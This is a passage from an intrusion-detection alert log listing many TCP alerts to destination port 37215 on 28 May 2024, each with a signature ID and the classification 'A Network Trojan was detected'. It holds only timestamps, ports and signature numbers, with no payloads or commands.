          Timestamp:05/28/24-14:47:46.958814
          SID:2835222
          Source Port:43396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.075754
          SID:2829579
          Source Port:32914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267944
          SID:2835222
          Source Port:48254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.664236
          SID:2835222
          Source Port:57018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.206913
          SID:2829579
          Source Port:60170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794387
          SID:2829579
          Source Port:49654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.998358
          SID:2835222
          Source Port:57042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.405408
          SID:2835222
          Source Port:59018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.294674
          SID:2829579
          Source Port:52938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.446630
          SID:2835222
          Source Port:53886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.806229
          SID:2829579
          Source Port:38496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328636
          SID:2829579
          Source Port:56810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.727835
          SID:2829579
          Source Port:38722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.243003
          SID:2835222
          Source Port:57956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977351
          SID:2829579
          Source Port:47972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.763893
          SID:2835222
          Source Port:34690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847472
          SID:2835222
          Source Port:59816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.681494
          SID:2829579
          Source Port:35144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.679586
          SID:2829579
          Source Port:49028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.411804
          SID:2835222
          Source Port:44992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.491412
          SID:2835222
          Source Port:51282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.916687
          SID:2835222
          Source Port:56496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.689519
          SID:2835222
          Source Port:44684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.659833
          SID:2829579
          Source Port:58784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324682
          SID:2835222
          Source Port:43456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839580
          SID:2829579
          Source Port:34314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.549198
          SID:2829579
          Source Port:40258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.214092
          SID:2835222
          Source Port:55506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.302147
          SID:2829579
          Source Port:55756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.510280
          SID:2835222
          Source Port:43492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.548475
          SID:2835222
          Source Port:45228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.813273
          SID:2835222
          Source Port:37104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.278908
          SID:2835222
          Source Port:37018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.729175
          SID:2829579
          Source Port:45824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299487
          SID:2835222
          Source Port:34612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.597367
          SID:2835222
          Source Port:35004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.951924
          SID:2829579
          Source Port:54108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.159141
          SID:2835222
          Source Port:43748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328933
          SID:2835222
          Source Port:36118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708553
          SID:2835222
          Source Port:39138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196809
          SID:2829579
          Source Port:48986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176420
          SID:2829579
          Source Port:41130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.741856
          SID:2835222
          Source Port:39416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.618379
          SID:2829579
          Source Port:54112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.656607
          SID:2829579
          Source Port:43988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272247
          SID:2835222
          Source Port:56510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.738334
          SID:2829579
          Source Port:41970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.125627
          SID:2829579
          Source Port:52578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.729325
          SID:2835222
          Source Port:40622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.655493
          SID:2835222
          Source Port:55314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.187383
          SID:2835222
          Source Port:50156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.782988
          SID:2835222
          Source Port:48864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.152217
          SID:2835222
          Source Port:41478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530158
          SID:2835222
          Source Port:57366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891764
          SID:2829579
          Source Port:50666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.039872
          SID:2829579
          Source Port:38462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.154167
          SID:2835222
          Source Port:38372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.482836
          SID:2835222
          Source Port:51438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.858879
          SID:2829579
          Source Port:54062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213991
          SID:2835222
          Source Port:58962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.553370
          SID:2829579
          Source Port:43524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.302255
          SID:2835222
          Source Port:47356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.411845
          SID:2829579
          Source Port:48594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.039817
          SID:2835222
          Source Port:58618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594973
          SID:2835222
          Source Port:33326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.037611
          SID:2835222
          Source Port:59548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272292
          SID:2835222
          Source Port:47640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177088
          SID:2829579
          Source Port:34260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.938607
          SID:2835222
          Source Port:58120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.701297
          SID:2835222
          Source Port:41346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845474
          SID:2829579
          Source Port:45108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.009970
          SID:2829579
          Source Port:46370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.680333
          SID:2835222
          Source Port:36038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.532945
          SID:2829579
          Source Port:45412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.989108
          SID:2835222
          Source Port:43038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485350
          SID:2835222
          Source Port:46166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.376103
          SID:2829579
          Source Port:41972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793333
          SID:2835222
          Source Port:58076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291824
          SID:2829579
          Source Port:60252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.482468
          SID:2829579
          Source Port:48726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.739222
          SID:2829579
          Source Port:53484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178066
          SID:2829579
          Source Port:52308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.889832
          SID:2829579
          Source Port:56162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.598881
          SID:2829579
          Source Port:59056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.278150
          SID:2835222
          Source Port:54662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.020502
          SID:2835222
          Source Port:60168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530022
          SID:2829579
          Source Port:38666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.164617
          SID:2829579
          Source Port:50394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537902
          SID:2835222
          Source Port:37988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.796828
          SID:2829579
          Source Port:35206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.269338
          SID:2829579
          Source Port:58822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214863
          SID:2835222
          Source Port:60802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.009967
          SID:2835222
          Source Port:44500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.625608
          SID:2829579
          Source Port:45666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.843403
          SID:2835222
          Source Port:56922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.170438
          SID:2829579
          Source Port:39316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326744
          SID:2835222
          Source Port:37894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.944931
          SID:2835222
          Source Port:47068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.074980
          SID:2835222
          Source Port:55812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.659940
          SID:2835222
          Source Port:51000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.563035
          SID:2829579
          Source Port:48718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710159
          SID:2835222
          Source Port:35896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.287707
          SID:2835222
          Source Port:50930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847791
          SID:2829579
          Source Port:39564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.729137
          SID:2829579
          Source Port:53980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.739585
          SID:2829579
          Source Port:59026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.820875
          SID:2829579
          Source Port:44038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.068450
          SID:2835222
          Source Port:46424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.112766
          SID:2835222
          Source Port:57030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.874109
          SID:2835222
          Source Port:59392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.892913
          SID:2835222
          Source Port:35760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.293126
          SID:2829579
          Source Port:52444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.704890
          SID:2829579
          Source Port:41406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.475714
          SID:2835222
          Source Port:48550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.877686
          SID:2835222
          Source Port:56498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.819746
          SID:2829579
          Source Port:49256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.082771
          SID:2829579
          Source Port:53516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.015060
          SID:2829579
          Source Port:53326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.849262
          SID:2829579
          Source Port:58612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977558
          SID:2835222
          Source Port:40294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462103
          SID:2835222
          Source Port:36922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214155
          SID:2835222
          Source Port:46052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.998651
          SID:2835222
          Source Port:34220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338091
          SID:2835222
          Source Port:35728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.976823
          SID:2829579
          Source Port:40636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.566325
          SID:2835222
          Source Port:40698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846814
          SID:2835222
          Source Port:46462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.246969
          SID:2829579
          Source Port:59814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847040
          SID:2835222
          Source Port:51870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.334627
          SID:2829579
          Source Port:53484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.112793
          SID:2835222
          Source Port:57376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.556763
          SID:2835222
          Source Port:57970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.623079
          SID:2835222
          Source Port:58894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.156836
          SID:2829579
          Source Port:58410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710076
          SID:2835222
          Source Port:43488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.610434
          SID:2829579
          Source Port:38560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.114553
          SID:2835222
          Source Port:34650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.301285
          SID:2835222
          Source Port:55574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.280371
          SID:2835222
          Source Port:53280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.781088
          SID:2829579
          Source Port:38126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.058204
          SID:2829579
          Source Port:59902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.560217
          SID:2835222
          Source Port:38520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.598755
          SID:2835222
          Source Port:44192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.341403
          SID:2829579
          Source Port:43036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.268210
          SID:2829579
          Source Port:56534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201505
          SID:2829579
          Source Port:41708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.760078
          SID:2829579
          Source Port:58558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.681108
          SID:2829579
          Source Port:35132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.924060
          SID:2829579
          Source Port:39074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.339339
          SID:2835222
          Source Port:37352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.321084
          SID:2829579
          Source Port:52406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530324
          SID:2829579
          Source Port:44918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.979069
          SID:2835222
          Source Port:40270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953563
          SID:2835222
          Source Port:40036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.913820
          SID:2829579
          Source Port:57908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.855969
          SID:2835222
          Source Port:56792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.243922
          SID:2835222
          Source Port:49346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.796936
          SID:2829579
          Source Port:38822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.480800
          SID:2835222
          Source Port:59758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.996185
          SID:2829579
          Source Port:42072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336971
          SID:2829579
          Source Port:44508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.989019
          SID:2829579
          Source Port:48740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.111708
          SID:2829579
          Source Port:48930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324076
          SID:2835222
          Source Port:38086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846415
          SID:2835222
          Source Port:60358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.051162
          SID:2829579
          Source Port:34644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.876323
          SID:2835222
          Source Port:41584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.908035
          SID:2829579
          Source Port:54832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.237477
          SID:2829579
          Source Port:58156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337010
          SID:2835222
          Source Port:40278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.822609
          SID:2835222
          Source Port:34112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923098
          SID:2835222
          Source Port:48146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402441
          SID:2835222
          Source Port:53284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.191915
          SID:2835222
          Source Port:49814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594379
          SID:2835222
          Source Port:57992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195228
          SID:2835222
          Source Port:53444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543472
          SID:2829579
          Source Port:56000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.357067
          SID:2835222
          Source Port:39848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.525740
          SID:2829579
          Source Port:57060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.197765
          SID:2829579
          Source Port:51450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594874
          SID:2829579
          Source Port:48874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551578
          SID:2829579
          Source Port:49326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.601990
          SID:2829579
          Source Port:46456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.979038
          SID:2835222
          Source Port:35606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.075111
          SID:2829579
          Source Port:37940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.811745
          SID:2829579
          Source Port:47898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.553587
          SID:2829579
          Source Port:60658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.157024
          SID:2835222
          Source Port:38660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.146185
          SID:2835222
          Source Port:36808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328002
          SID:2829579
          Source Port:44358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.590802
          SID:2829579
          Source Port:39412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847728
          SID:2829579
          Source Port:40040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176672
          SID:2829579
          Source Port:44782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266230
          SID:2829579
          Source Port:49212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.156293
          SID:2835222
          Source Port:57446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.670048
          SID:2835222
          Source Port:55218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.849306
          SID:2829579
          Source Port:39030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.741645
